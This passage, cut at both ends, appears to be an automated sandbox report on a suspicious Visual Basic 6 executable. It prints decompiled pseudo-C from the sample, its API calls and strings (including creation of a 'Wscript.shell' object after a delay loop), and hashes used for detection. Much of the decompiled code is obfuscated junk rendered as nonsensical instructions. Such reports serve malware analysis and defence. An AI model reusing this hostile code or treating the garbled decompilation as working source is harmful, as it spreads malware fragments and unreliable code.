				signed int _v84;
				char _v88;
				char _v104;
				char _v120;
				char _v124;
				void* _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v148;
				intOrPtr _v152;
				char _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr* _v168;
				signed int _v172;
				intOrPtr _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				intOrPtr* _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				long long _v228;
				signed int _t211;
				signed int _t217;
				signed int _t229;
				signed int _t235;
				void* _t241;
				signed int _t244;
				intOrPtr* _t246;
				char* _t248;
				char* _t249;
				signed int _t258;
				signed int _t263;
				signed int _t264;
				signed int _t267;
				void* _t268;
				signed int* _t271;
				char* _t273;
				void* _t284;
				void* _t286;
				void* _t287;
				void* _t288;
				intOrPtr* _t289;
				long long _t309;

				_t268 = __ebx;
				_t287 = _t288;
				_t289 = _t288 - 0xc;
				 *[fs:0x0] = _t289;
				L00401230();
				_v16 = _t289;
				_v12 = 0x401218;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401236, _t286);
				_v136 = 0x613268;
				_v132 =  *0x401210;
				_t13 =  &_v136; // 0x613268
				 *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v132, _t13,  &_v124);
				_v72 = _v124;
				 *((intOrPtr*)( *_a4 + 0x710))(_a4, 0xf75, 0x513e6e10, 0x5b05, 0x10850d,  &_v132);
				_v60 = _v132;
				_v136 = 0x3a9e0c;
				_v124 = 0x6198;
				_v132 = 0x2681b;
				_t211 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v132,  &_v124,  &_v136,  &_v140);
				_v160 = _t211;
				if(_v160 >= 0) {
					_v188 = _v188 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x4026e0);
					_push(_a4);
					_push(_v160);
					L0040136E();
					_v188 = _t211;
				}
				_v32 = _v140;
				_v148 =  *0x401208;
				L00401350();
				 *_t289 =  *0x401200;
				_t217 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v84,  &_v84,  &_v148,  &_v156);
				_v160 = _t217;
				if(_v160 >= 0) {
					_v192 = _v192 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x4026e0);
					_push(_a4);
					_push(_v160);
					L0040136E();
					_v192 = _t217;
				}
				_v80 = _v156;
				_v76 = _v152;
				_t271 =  &_v84;
				L004013B0();
				_v148 =  *0x4011f8;
				_v132 =  *0x4011f0;
				 *((intOrPtr*)( *_a4 + 0x714))(_a4, _t271, _t271,  &_v148);
				_v124 = 0x67db;
				L00401350();
				_t229 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v84,  &_v124,  &_v128);
				_v160 = _t229;
				if(_v160 >= 0) {
					_v196 = _v196 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x4026e0);
					_push(_a4);
					_push(_v160);
					L0040136E();
					_v196 = _t229;
				}
				_v40 = _v128;
				_t273 =  &_v84;
				L004013B0();
				_v136 = 0x30873;
				_t309 =  *0x4011e8;
				_v132 = _t309;
				_t235 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x33b96c,  &_v132,  &_v136);
				_v160 = _t235;
				if(_v160 >= 0) {
					_v200 = _v200 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x4026e0);
					_push(_a4);
					_push(_v160);
					L0040136E();
					_v200 = _t235;
				}
				 *((intOrPtr*)( *_a4 + 0x718))(_a4, 0xf03352b0, 0x5af6, 0x5db52a);
				_t241 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4, L"didynamous", 0x3791c2);
				_push(0x402a60);
				_push(0x402a60);
				L00401344();
				if(_t241 != 0) {
					_push( &_v104);
					L00401302();
					_push(1);
					_push( &_v104);
					_push( &_v120);
					L004012E4();
					L004012EA();
					L00401392();
					if( *0x413418 != 0) {
						_v204 = 0x413418;
					} else {
						_push(0x413418);
						_push(0x40293c);
						L00401374();
						_v204 = 0x413418;
					}
					_v160 =  *_v204;
					_t258 =  *((intOrPtr*)( *_v160 + 0x14))(_v160,  &_v88);
					asm("fclex");
					_v164 = _t258;
					if(_v164 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40292c);
						_push(_v160);
						_push(_v164);
						L0040136E();
						_v208 = _t258;
					}
					_v168 = _v88;
					_t263 =  *((intOrPtr*)( *_v168 + 0x130))(_v168,  &_v84);
					asm("fclex");
					_v172 = _t263;
					if(_v172 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x130);
						_push(0x402950);
						_push(_v168);
						_push(_v172);
						L0040136E();
						_v212 = _t263;
					}
					_t264 = _v84;
					_v184 = _t264;
					_v84 = _v84 & 0x00000000;
					L004013A4();
					_t273 =  &_v88;
					L00401368();
					_t309 =  *0x4011e0;
					L004012DE();
					_t267 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t264);
					asm("fclex");
					_v160 = _t267;
					if(_v160 >= 0) {
						_v216 = _v216 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x4026b0);
						_push(_a4);
						_push(_v160);
						L0040136E();
						_v216 = _t267;
					}
				}
				_t244 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4);
				asm("fclex");
				_v160 = _t244;
				if(_v160 >= 0) {
					_v220 = _v220 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x4026b0);
					_push(_a4);
					_push(_v160);
					L0040136E();
					_v220 = _t244;
				}
				_v36 = 0x30b0088;
				asm("fild dword [ebp-0x20]");
				_v228 = _t309;
				if( *0x413000 != 0) {
					_push( *0x4011dc);
					_push( *0x4011d8);
					L00401254();
				}
				L004012DE();
				_v36 = _t244;
				while(1) {
					_t246 = _v28 + 1;
					if(_t246 < 0) {
						break;
					}
					_v28 = _t246;
					if(_v28 >= 0x1388) {
						_push(0);
						_push(L"Wscript.shell");
						_push( &_v104); // executed
						L004012CC(); // executed
						_t248 =  &_v104;
						_push(_t248);
						L004012D2();
						_push(_t248);
						_t249 =  &_v64;
						_push(_t249);
						L004012D8();
						L00401392();
						_v36 = 0xc87;
						_t284 = 0;
						do {
							_t284 = _t284 + 1;
						} while (_t284 != 0x36ee3e);
						_push(_t268);
						_push(_t249);
						_push(_t284 + 0x9fc78);
						return _t249;
					} else {
						continue;
					}
					L39:
				}
				L004012C6();
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("sahf");
				asm("sahf");
				asm("sahf");
				asm("sahf");
				 *((intOrPtr*)(_t273 + _t246)) = ds;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				_push( *((intOrPtr*)(_t287 + _t268 + _t268 + 0x10000001)));
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				return _t246;
				goto L39;
			}

0x00411684
0x00411685
0x00411687
0x00411696
0x004116a2
0x004116aa
0x004116ad
0x004116ba
0x004116c3
0x004116ce
0x004116d1
0x004116e1
0x004116e8
0x004116fb
0x00411705
0x00411729
0x00411732
0x00411735
0x0041173f
0x00411745
0x0041176a
0x00411770
0x0041177d
0x0041179f
0x0041177f
0x0041177f
0x00411784
0x00411789
0x0041178c
0x00411792
0x00411797
0x00411797
0x004117ac
0x004117b5
0x004117c3
0x004117dd
0x004117ec
0x004117f2
0x004117ff
0x00411821
0x00411801
0x00411801
0x00411806
0x0041180b
0x0041180e
0x00411814
0x00411819
0x00411819
0x0041182e
0x00411837
0x0041183a
0x0041183d
0x00411848
0x0041185d
0x00411868
0x0041186e
0x0041187c
0x00411895
0x0041189b
0x004118a8
0x004118ca
0x004118aa
0x004118aa
0x004118af
0x004118b4
0x004118b7
0x004118bd
0x004118c2
0x004118c2
0x004118d5
0x004118d9
0x004118dc
0x004118e1
0x004118eb
0x004118f1
0x0041190c
0x00411912
0x0041191f
0x00411941
0x00411921
0x00411921
0x00411926
0x0041192b
0x0041192e
0x00411934
0x00411939
0x00411939
0x0041195f
0x00411977
0x0041197d
0x00411982
0x00411987
0x0041198e
0x00411997
0x00411998
0x0041199d
0x004119a2
0x004119a6
0x004119a7
0x004119b2
0x004119ba
0x004119c6
0x004119e3
0x004119c8
0x004119c8
0x004119cd
0x004119d2
0x004119d7
0x004119d7
0x004119f5
0x00411a0d
0x00411a10
0x00411a12
0x00411a1f
0x00411a41
0x00411a21
0x00411a21
0x00411a23
0x00411a28
0x00411a2e
0x00411a34
0x00411a39
0x00411a39
0x00411a4b
0x00411a63
0x00411a69
0x00411a6b
0x00411a78
0x00411a9d
0x00411a7a
0x00411a7a
0x00411a7f
0x00411a84
0x00411a8a
0x00411a90
0x00411a95
0x00411a95
0x00411aa4
0x00411aa7
0x00411aad
0x00411aba
0x00411abf
0x00411ac2
0x00411ac7
0x00411acd
0x00411adb
0x00411ade
0x00411ae0
0x00411aed
0x00411b0c
0x00411aef
0x00411aef
0x00411af1
0x00411af6
0x00411af9
0x00411aff
0x00411b04
0x00411b04
0x00411aed
0x00411b1b
0x00411b21
0x00411b23
0x00411b30
0x00411b52
0x00411b32
0x00411b32
0x00411b37
0x00411b3c
0x00411b3f
0x00411b45
0x00411b4a
0x00411b4a
0x00411b59
0x00411b60
0x00411b63
0x00411b76
0x00411b80
0x00411b86
0x00411b8c
0x00411b8c
0x00411b91
0x00411b96
0x00411b99
0x00411b9c
0x00411b9f
0x00000000
0x00000000
0x00411ba5
0x00411baf
0x00411bb3
0x00411bb5
0x00411bbd
0x00411bbe
0x00411bc3
0x00411bc6
0x00411bc7
0x00411bcc
0x00411bcd
0x00411bd0
0x00411bd1
0x00411bd9
0x00411bde
0x00411be5
0x00411be7
0x00411be7
0x00411be8
0x00411bf6
0x00411bf7
0x00411bf8
0x00411bf9
0x00411bb1
0x00000000
0x00411bb1
0x00000000
0x00411baf
0x00411c4f
0x00411c54
0x00411c55
0x00411c56
0x00411c57
0x00411c58
0x00411c59
0x00411c5a
0x00411c5b
0x00411c5c
0x00411c5d
0x00411c5e
0x00411c5f
0x00411c60
0x00411c61
0x00411c62
0x00411c63
0x00411c64
0x00411c69
0x00411c6b
0x00411c6d
0x00411c6f
0x00411c76
0x00411c78
0x00411c7a
0x00411c7c
0x00411c7e
0x00411c80
0x00411c82
0x00411c84
0x00411c86
0x00411c88
0x00411c8a
0x00411c8c
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 004116A2
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004026E0,000006FC), ref: 00411792
__vbaStrCopy.MSVBVM60(00000000,00401218,004026E0,000006FC), ref: 004117C3
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004026E0,00000700,?,?,?), ref: 00411814
__vbaFreeStr.MSVBVM60(?,?,?), ref: 0041183D
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?), ref: 0041187C
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004026E0,00000704,?,?,?,?,?,?), ref: 004118BD
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?), ref: 004118DC
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004026E0,00000708,?,?,?,?,?,?), ref: 00411934
__vbaStrCmp.MSVBVM60(00402A60,00402A60,?,?,?,?,?,?), ref: 00411987
#610.MSVBVM60(?,00402A60,00402A60,?,?,?,?,?,?), ref: 00411998
#552.MSVBVM60(?,?,00000001,?,00402A60,00402A60,?,?,?,?,?,?), ref: 004119A7
__vbaVarMove.MSVBVM60(?,?,00000001,?,00402A60,00402A60,?,?,?,?,?,?), ref: 004119B2
__vbaFreeVar.MSVBVM60(?,?,00000001,?,00402A60,00402A60,?,?,?,?,?,?), ref: 004119BA
__vbaNew2.MSVBVM60(0040293C,00413418,?,?,00000001,?,00402A60,00402A60,?,?,?,?,?,?), ref: 004119D2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040292C,00000014,?,?,?,?,?,?), ref: 00411A34
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402950,00000130,?,?,?,?,?,?), ref: 00411A90
__vbaStrMove.MSVBVM60(?,?,?,?,?,?), ref: 00411ABA
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?), ref: 00411AC2
__vbaFpI4.MSVBVM60(?,?,?,?,?,?), ref: 00411ACD
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004026B0,00000064,?,?,?,?,?,?), ref: 00411AFF
__vbaHresultCheckObj.MSVBVM60(00000000,00401218,004026B0,000002B4,?,?,?,?,?,?), ref: 00411B45
_adj_fdiv_m64.MSVBVM60(?,?,?,?,?,?,?,?), ref: 00411B8C
__vbaFpI4.MSVBVM60(?,?,?,?,?,?,?,?), ref: 00411B91
#716.MSVBVM60(?,Wscript.shell,00000000,?,?,?,?,?,?,?,?), ref: 00411BBE
__vbaObjVar.MSVBVM60(?,?,Wscript.shell,00000000,?,?,?,?,?,?,?,?), ref: 00411BC7
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Wscript.shell,00000000,?,?,?,?,?,?,?,?), ref: 00411BD1
__vbaFreeVar.MSVBVM60(?,00000000,?,?,Wscript.shell,00000000,?,?,?,?,?,?,?,?), ref: 00411BD9

Strings

Skuringers, xrefs: 00411874
h2a, xrefs: 004116E8, 004116EE
Wscript.shell, xrefs: 00411BB5
didynamous, xrefs: 0041196A
>6, xrefs: 00411BE8
ANTILLAS, xrefs: 004117BB

Memory Dump Source

Source File: 00000003.00000002.762481080.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.762462032.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.762549972.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.762578524.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$CopyMove$#552#610#716AddrefChkstkNew2_adj_fdiv_m64
String ID: >6$ANTILLAS$Skuringers$Wscript.shell$didynamous$h2a
API String ID: 4221906290-931364018
Opcode ID: 29a4692b382ed47f0323b318a762873d873b8bb17da5fce4d05df86f34629da0
Instruction ID: c10e80fa50684747c2664ecf627648de311d6d7eb707f0e0a06c9753ec8856d7
Opcode Fuzzy Hash: 29a4692b382ed47f0323b318a762873d873b8bb17da5fce4d05df86f34629da0
Instruction Fuzzy Hash: 98F1D374900218EFDB11DFA5CD85BDDBBB4BF08304F1081AAF509BB2A1DB785A948F58

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02AE4D43, Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.765264321.0000000002AE0000.00000040.00000001.sdmp, Offset: 02AE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4961459971fc87ca4383a3fffdcbb429113422e69bd04e555029fc306d4d048d
Instruction ID: 73a2277375f1565b9e93d2e8e944ebae66ba8e1d4dfa74ec0565bc98e2b22859
Opcode Fuzzy Hash: 4961459971fc87ca4383a3fffdcbb429113422e69bd04e555029fc306d4d048d
Instruction Fuzzy Hash: 2C813572A04344CFDB34CE29D9A03EA37F2AF59304F94452ED98E9FA05D731A646CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0040954B, Relevance: .2, Instructions: 196
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E0040954B(void* __eax, signed int __ebx, signed int __edx, signed int __edi, signed int __esi) {
				void* _t37;
				signed int _t38;
				signed int* _t42;
				signed char _t48;
				signed int* _t51;
				signed int _t55;
				signed int _t57;
				signed int _t59;
				signed int _t60;
				signed int* _t61;
				signed int _t72;

				_t59 = __esi;
				_t57 = __edi;
				_t55 = __edx;
				asm("sbb dl, cl");
				asm("int3");
				asm("stc");
				asm("sbb eax, 0x7ba4191d");
				 *(_t61 + __edi * 8) =  !( *(_t61 + __edi * 8));
				_push(__edi);
				asm("repe cdq");
				_t37 = __eax -  *((intOrPtr*)(__eax - 0x6b524dd0));
				_t48 = __ebx ^  *0xd;
				 *((intOrPtr*)(__edi - 0x5fd5334b)) =  *((intOrPtr*)(__edi - 0x5fd5334b)) - 0xd;
				 *(_t37 + 0x3830a5c0) =  *(_t37 + 0x3830a5c0) ^ __edx;
				 *((intOrPtr*)(_t37 - 0x5e255b47)) =  *((intOrPtr*)(_t37 - 0x5e255b47)) - _t37;
				 *0xd =  *0xd ^ _t48;
				_t38 =  *0xb5b26363;
				_push(__edx);
				 *0xd =  *0xd ^ __edi;
				 *_t48 =  *_t48 - 0xd;
				if( *_t48 >= 0) {
					L4:
					asm("pushfd");
					asm("sbb edi, esp");
					asm("scasd");
					asm("fidiv dword [edi+0x61]");
					_pop(_t51);
					_pop(ss);
					_t38 = _t38 ^ 0x1ea37ea4;
					_pop(_t57);
					_t60 = _t60 + 1;
					if(_t60 >= 0) {
						goto L2;
					} else {
						asm("adc eax, 0xa0283834");
						L6:
						_t38 =  *0xa8288ecf;
						gs =  *_t38;
						asm("cmc");
						_t55 = _t55 + _t48;
						asm("lodsd");
					}
				} else {
					 *0x28382035 = _t38;
					_t41 =  *0x62a9f319;
					 *0xd =  *0xd ^ _t48;
					 *((intOrPtr*)(_t41 - 0x5e264347)) =  *((intOrPtr*)( *0x62a9f319 - 0x5e264347)) -  *0x62a9f319;
					 *0xd =  *0xd ^ _t48;
					_t42 =  *0xadb26070;
					_push(0xd);
					 *0xd =  *0xd ^ __edi;
					_t42[0x10] = _t42[0x10] - 0xd;
					_t60 =  *_t42 * 0xffffffa0;
					asm("fist dword [ecx]");
					 *_t42 = _t42 +  *_t42;
					 *_t48 =  *_t48 + _t48;
					 *_t42 = _t42 +  *_t42;
					 *_t48 =  *_t48 + _t48;
					 *_t42 = _t42 +  *_t42;
					 *_t48 =  *_t48 + _t48;
					 *_t42 = _t42 +  *_t42;
					 *_t48 =  *_t48 + _t48;
					 *_t42 = _t42 +  *_t42;
					 *_t48 =  *_t48 + _t48;
					 *_t42 = _t42 +  *_t42;
					 *_t48 =  *_t48 + _t48;
					 *_t42 = _t42 +  *_t42;
					asm("in al, 0xa0");
					_push(cs);
					 *(_t48 + 0x29) =  *(_t48 + 0x29) & __edx;
					_t72 =  &(_t42[0x36]) & 0xe4d07a73;
					_t61 = 0xd;
					asm("repne push esi");
					asm("popfd");
					_t38 =  *0xb8e4feb9;
					L2:
					asm("in al, 0xb8");
					asm("adc bh, [edi+0x6a930255]");
					asm("aas");
					asm("out 0x28, al");
					_pop(_t51);
					if(_t72 <= 0) {
						asm("invalid");
						 *((intOrPtr*)(_t38 - 0x63d10ad0)) =  *((intOrPtr*)(_t38 - 0x63d10ad0)) - _t61;
						goto L4;
					}
				}
				 *_t51 =  *_t51 << 1;
				if( *_t38 < _t60) {
					goto L6;
				}
				 *(_t60 + 0x30a02948) =  *(_t60 + 0x30a02948) & _t38;
				asm("movsd");
				 *0x6538F5DB =  *((intOrPtr*)(0x6538f5db)) + _t60;
				 *((intOrPtr*)(_t59 - 0x59)) =  *((intOrPtr*)(_t59 - 0x59)) - 0x2d;
				asm("sbb al, 0x4");
				 *(_t60 + 0x30a02948) =  *(_t60 + 0x30a02948) & _t59;
				asm("out dx, eax");
				asm("clc");
				asm("lock mov eax, 0x35015dd");
				asm("sbb bl, [eax]");
				asm("wait");
				 *0x94DF07DD =  *((intOrPtr*)(0x94df07dd)) - _t61;
				 *0x48 =  *0x48 ^ _t57;
				 *0x2d =  *0x2d - 0x48;
				if( *0x2d < 0) {
					asm("int3");
					 *0xb8d9c425 =  *0xb8d9c425 + 0x3155c319;
					return  *0x383c38f7;
				}
				return 0x3931d1ad;
			}

0x0040954b
0x0040954b
0x0040954b
0x0040954b
0x0040954d
0x0040954e
0x0040954f
0x00409554
0x00409557
0x0040955d
0x00409562
0x00409568
0x0040956a
0x00409570
0x00409576
0x0040957c
0x0040957e
0x00409583
0x00409584
0x00409586
0x00409588
0x00409607
0x00409607
0x00409608
0x0040960a
0x0040960b
0x00409610
0x00409611
0x00409612
0x00409617
0x00409618
0x00409619
0x00000000
0x0040961b
0x0040961b
0x0040961d
0x0040961f
0x00409621
0x00409627
0x00409628
0x0040962a
0x0040962a
0x0040958a
0x0040958a
0x0040958f
0x00409594
0x00409596
0x0040959c
0x0040959e
0x004095a3
0x004095a4
0x004095a6
0x004095a9
0x004095ac
0x004095ae
0x004095b2
0x004095b4
0x004095b8
0x004095ba
0x004095be
0x004095c0
0x004095c4
0x004095c6
0x004095ca
0x004095cc
0x004095d0
0x004095d2
0x004095d6
0x004095d9
0x004095dc
0x004095df
0x004095e5
0x004095e7
0x004095e9
0x004095ef
0x004095f2
0x004095f2
0x004095f4
0x004095fa
0x004095fb
0x004095fd
0x004095fe
0x00409600
0x00409602
0x00000000
0x00409602
0x004095fe
0x0040962b
0x0040962f
0x00000000
0x00000000
0x00409633
0x00409639
0x0040963a
0x00409646
0x00409649
0x0040964b
0x00409651
0x00409653
0x00409656
0x0040965d
0x0040965f
0x00409662
0x00409668
0x0040966a
0x0040966c
0x00409678
0x00409680
0x00000000
0x00409680
0x00409687

Memory Dump Source

Source File: 00000003.00000002.762481080.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.762462032.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.762549972.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.762578524.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faade40bf9847df52eff550d9dd153931259dfdaf3e38247be8cc288bc070c6d
Instruction ID: 7825f6a28de29a1c67eda70a8b71eb693c022e7578d7dfe45ec93b0ca082dd00
Opcode Fuzzy Hash: faade40bf9847df52eff550d9dd153931259dfdaf3e38247be8cc288bc070c6d
Instruction Fuzzy Hash: A071E0764093D09FCB178F38C8A96857FB0FF1B21432909DEC4818F262E736A852DB52

Uniqueness

Uniqueness Score: -1.00%

Function 02AE247B, Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.765264321.0000000002AE0000.00000040.00000001.sdmp, Offset: 02AE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1308afb6b2ebc801f29aa89aea42ac738ca2353eecc6588f3400e9c8a04e38c
Instruction ID: 70c0ff94faf7b3f3b69db36f679c1eff2eb713dcebf8c1b14f5c5b515db94489
Opcode Fuzzy Hash: c1308afb6b2ebc801f29aa89aea42ac738ca2353eecc6588f3400e9c8a04e38c
Instruction Fuzzy Hash: 4351E571A442499FDF749E28CD99BDA7BE6EF9C350F41812DEC8DDB210C7318A428B41

Uniqueness

Uniqueness Score: -1.00%

Function 02AE4D6E, Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.765264321.0000000002AE0000.00000040.00000001.sdmp, Offset: 02AE0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ec2ee0a1334e4efd83fd23bb93fab1ad15a587f7b702cfccd03679843a4d321
Instruction ID: a3ccac029a39dc15373eb37670dbf64e5d9def64aa9195eb70c6aaebd7caab76
Opcode Fuzzy Hash: 1ec2ee0a1334e4efd83fd23bb93fab1ad15a587f7b702cfccd03679843a4d321
Instruction Fuzzy Hash: AD510171908780CFDB30CF25D9A57DA3BF2AF49308F94406AD88E8F609DB31A546CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02AE2A50, Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.765264321.0000000002AE0000.00000040.00000001.sdmp, Offset: 02AE0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 540075f12d7619727448915cbb646b96f89396145555492cd7cea7f489e35288
Instruction ID: 0d9568a4a352c8afe23cc9ecc2442b4ba5655ed9ffe4dc3de018a260cf6648f1
Opcode Fuzzy Hash: 540075f12d7619727448915cbb646b96f89396145555492cd7cea7f489e35288
Instruction Fuzzy Hash: 9041F772A403899BCF389F38CD987EF3B67AF99340F458119DC4A5B250DB344A42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02AE2A45, Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.765264321.0000000002AE0000.00000040.00000001.sdmp, Offset: 02AE0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 0b901d9886b0a8d08e762f7dfe5afbfd0d50bbfea3cbefa9a57527e16728da14
Instruction ID: 72c25e1aec211d18ff2a5c4fa75b6dcd5cc2dcb5a0c2f55b6fca43293425a643
Opcode Fuzzy Hash: 0b901d9886b0a8d08e762f7dfe5afbfd0d50bbfea3cbefa9a57527e16728da14
Instruction Fuzzy Hash: AF41EF72A45389DFCF359F38CC997EA3BA6AF99300F45815ADC4A5B214DB304A42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0040784E, Relevance: .1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040784E() {
				signed int _t37;
				char _t50;
				void* _t52;
				signed char _t54;
				signed char _t55;
				signed char _t61;
				signed int _t63;
				void* _t65;
				signed int _t71;
				signed int _t72;
				signed int* _t75;
				void* _t79;
				signed int _t96;

				asm("insb");
				_t37 =  *0x313fbdb2 - 0x88b1926e;
				asm("das");
				asm("cmpsb");
				 *(_t63 + 0x3b000cd2) =  *(_t63 + 0x3b000cd2) & _t63;
				 *_t37 =  *_t37 + _t37;
				 *_t54 =  *_t54 + _t54;
				 *_t37 =  *_t37 + _t37;
				 *_t54 =  *_t54 + _t54;
				 *_t37 =  *_t37 + _t37;
				 *_t54 =  *_t54 + _t54;
				 *_t37 =  *_t37 + _t37;
				 *_t54 =  *_t54 + _t54;
				 *_t37 =  *_t37 + _t37;
				 *_t54 =  *_t54 + _t54;
				 *_t37 =  *_t37 + _t37;
				asm("insb");
				 *_t37 =  *_t37 ^ _t37;
				asm("jecxz 0x53");
				asm("rdtsc");
				asm("outsb");
				asm("hlt");
				 *(_t72 + 0x17bb5906) =  *(_t72 + 0x17bb5906) ^ _t71;
				asm("bound ebx, [eax]");
				asm("sbb al, 0x85");
				 *(_t54 + 0xa5302a1) =  *(_t54 + 0xa5302a1) & _t37;
				asm("out 0x6f, al");
				asm("lodsd");
				asm("das");
				asm("loope 0xffffffb9");
				asm("movsd");
				 *0xFFFFFFFFA1C88D2C =  *((intOrPtr*)(0xffffffffa1c88d2c)) - 0x73;
				 *0xadb9e4c1 =  *0xadb9e4c1 ^ _t54;
				 *0xadb9e4c1 =  *0xadb9e4c1 ^ _t71;
				 *0xadb9e4c1 =  *0xadb9e4c1 - 0xadb9e4c1;
				asm("enter 0x283c, 0xa8");
				 *0xadb9e4c1 =  *0xadb9e4c1 ^ _t54;
				_pop(_t65);
				_t55 = _t54 ^  *(_t77 - 0x164fca5b);
				asm("int1");
				asm("cld");
				 *(0x71b32fcc +  *0x342524fc - 0x2f93e7cd) =  *(0x71b32fcc +  *0x342524fc - 0x2f93e7cd) & _t72;
				asm("loope 0xffffffbd");
				 *0x9e403930 = 4;
				asm("adc ch, [edi]");
				asm("iretd");
				_push(es);
				_t61 = 0xadb9e4c1 +  *((intOrPtr*)(_t65 + _t55 * 8)) ^  *_t71;
				_t50 = _t72 + 1 - 0xffffff94;
				_t75 =  *0x23fcbc52;
				if(_t61 != 0) {
					L6:
					 *_t55 =  *_t55 + _t55;
					 *_t50 =  *_t50 + _t50;
					 *_t55 =  *_t55 + _t55;
					 *_t50 =  *_t50 + _t50;
					 *_t55 =  *_t55 + _t55;
					 *_t50 =  *_t50 + _t50;
					 *_t55 =  *_t55 + _t55;
					 *_t50 =  *_t50 + _t50;
					 *_t55 =  *_t55 + _t55;
					 *_t50 =  *_t50 + _t50;
					 *_t55 =  *_t55 + _t55;
					 *_t50 =  *_t50 + _t50;
					 *_t55 =  *_t55 + _t55;
					 *_t50 =  *_t50 + _t50;
					 *_t55 =  *_t55 + _t55;
					asm("in al, 0xbc");
					asm("in al, 0xe0");
					asm("aad 0xa7");
					_pop(_t79);
					 *0x28316027 = _t50;
					 *_t61 =  *_t61 ^ _t55;
					 *(_t61 + 0x16) =  *(_t61 + 0x16) >> 0x39;
					_t52 = _t79;
					_t33 = _t52 - 0x7fa24dd0;
					 *_t33 =  *((intOrPtr*)(_t52 - 0x7fa24dd0)) - _t52;
					if ( *_t33 >= 0) goto L7;
					goto L7;
					L7:
					switch([far dword [esi+ebp*4]) {
					}
				}
				asm("aad 0x14");
				asm("rcr dword [esi], 1");
				while(1) {
					asm("invalid");
					_t77 =  *_t75 * 0x31f530a0;
					_t96 =  *_t75 * 0x31f530a0;
					if(_t96 != 0) {
						break;
					}
					asm("aas");
					asm("arpl [ecx-0x63943671], si");
					asm("xlatb");
					if(_t96 == 0) {
						continue;
					}
					asm("loope 0xffffffea");
					asm("movsb");
					 *0x50c43b47 = _t50;
					break;
				}
				_push(_t50);
				asm("hlt");
				asm("repe or eax, 0x15db86");
				goto L6;
			}

0x00407857
0x00407858
0x0040785d
0x00407862
0x00407863
0x00407869
0x0040786d
0x0040786f
0x00407873
0x00407875
